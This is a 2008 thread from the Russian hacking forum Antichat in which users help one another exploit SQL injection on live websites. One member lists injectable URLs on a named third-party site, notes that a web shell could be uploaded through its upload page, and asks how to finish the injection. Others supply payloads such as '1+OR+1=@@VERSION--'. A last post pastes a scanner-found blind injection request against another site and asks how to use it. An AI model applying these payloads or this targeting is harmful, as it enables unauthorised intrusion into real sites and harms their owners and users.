HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 14.03.2008, 20:14
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

2 Snap
А насчёт таблиц-ручками ,вот ссылка на дефолтные может пригодится?:
_http://forum.antichat.ru/showpost.php?p=465677&postcount=3
Удачи
 
Ответить с цитированием

  #2  
Старый 15.03.2008, 14:13
MaSter GeN
Познающий
Регистрация: 26.01.2008
Сообщений: 71
С нами: 9626078

Репутация: 141
По умолчанию

Код:
http://www.xxx.xxx/includes/xxxx.asp?pg=1'
орет
Unclosed quotation mark before the character string '1''
скуль ?
 
Ответить с цитированием

  #3  
Старый 15.03.2008, 14:34
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

2 MaSter GeN
90%
 
Ответить с цитированием

  #4  
Старый 15.03.2008, 18:43
MaSter GeN
Познающий
Регистрация: 26.01.2008
Сообщений: 71
С нами: 9626078

Репутация: 141
По умолчанию

Цитата:
Сообщение от jokester  
2 MaSter GeN
90%
собственно в чем закючаеться вопрос то
Код:
1'+OR+1=@@VERSION()--
орет ncorrect syntax near the keyword 'OR'
почему ? или енто кокраз оставшиеся 10%

Последний раз редактировалось MaSter GeN; 15.03.2008 в 18:47..
 
Ответить с цитированием

  #5  
Старый 15.03.2008, 19:27
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

MaSter GeN, убери скобки, если не поможет, еще и ковычку убери
Цитата:
1+OR+1=@@VERSION--
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #6  
Старый 15.03.2008, 19:56
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

Эта ошибка может возникнуть по 2 причинам :
1 инъекция-90%
2 кривые руки программера-10%
Т.к. вопрос изначально стоял так:"скуль?", я и дал 90%
Ну и разумеется если 1+or+1=@@version-- без скобок ,со скобкой,с одинарной кавычкой,с двойной кавычкой,без кавычки проходит то скуль :d
А вообще была-бы ссылка было-бы проще :d
 
Ответить с цитированием

  #7  
Старый 15.03.2008, 20:13
cadam
Новичок
Регистрация: 09.02.2008
Сообщений: 7
С нами: 9606172

Репутация: -1
По умолчанию

http://video.antichat.ru/file98.html - в каких версиях работает? в каких форумах не пробую нигде не получается
 
Ответить с цитированием

  #8  
Старый 15.03.2008, 20:17
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами: 9644006

Репутация: 3099


По умолчанию

осмелюсь предположить это за 2005 или 2006 год

Видео снимается в основном для понимания основ а не для того чтоб ты смотрел и сразу хек

Последний раз редактировалось xcedz; 15.03.2008 в 20:19..
 
Ответить с цитированием

  #9  
Старый 15.03.2008, 20:24
MaSter GeN
Познающий
Регистрация: 26.01.2008
Сообщений: 71
С нами: 9626078

Репутация: 141
По умолчанию

да конечно вот ссылка
Код:
http://www.nbc40.net/includes/pgstat.asp?pg=1'
и сдесь
Код:
http://www.nbc40.net/pages/newspix/newspix.asp?ID=10'
возможность залития шелла в папку аплоадс через вот сдесь
Код:
http://www.nbc40.net/pages/upload.php
ну и вообше на сервере дотупны к просмотрю все папки +раскрытие путей
но хотело бы добить скуль не с ковычками не без не со скобками не без не идет
 
Ответить с цитированием

  #10  
Старый 15.03.2008, 20:37
4y4o
Познающий
Регистрация: 22.01.2007
Сообщений: 40
С нами: 10157510

Репутация: 4
По умолчанию

Просканил сайтик Acunetix.Web.Vulnerability.Scanner сканером. Выдало Blind SQL/XPath injection.

View HTTP headers
Request
POST /index.php?page=uvod HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.site.ru
Content-Length: 134
Connection: Close
Pragma: no-cache
Acunetix-Product: WVS/5.5 (Acunetix Web Vulnerability Scanner - NORMAL)
Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm

username=111-222-1933email@address.tst&pass=111-222-1933email@address.tst'+%7C%7C+'ACUtwoACU&pass1=111-222-1933email@address.tst&b1=Ok

Как заюзать в этом случае инъекцию? Как использовать пост запрос на практике? Помогите новичку. Подробней если можна
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.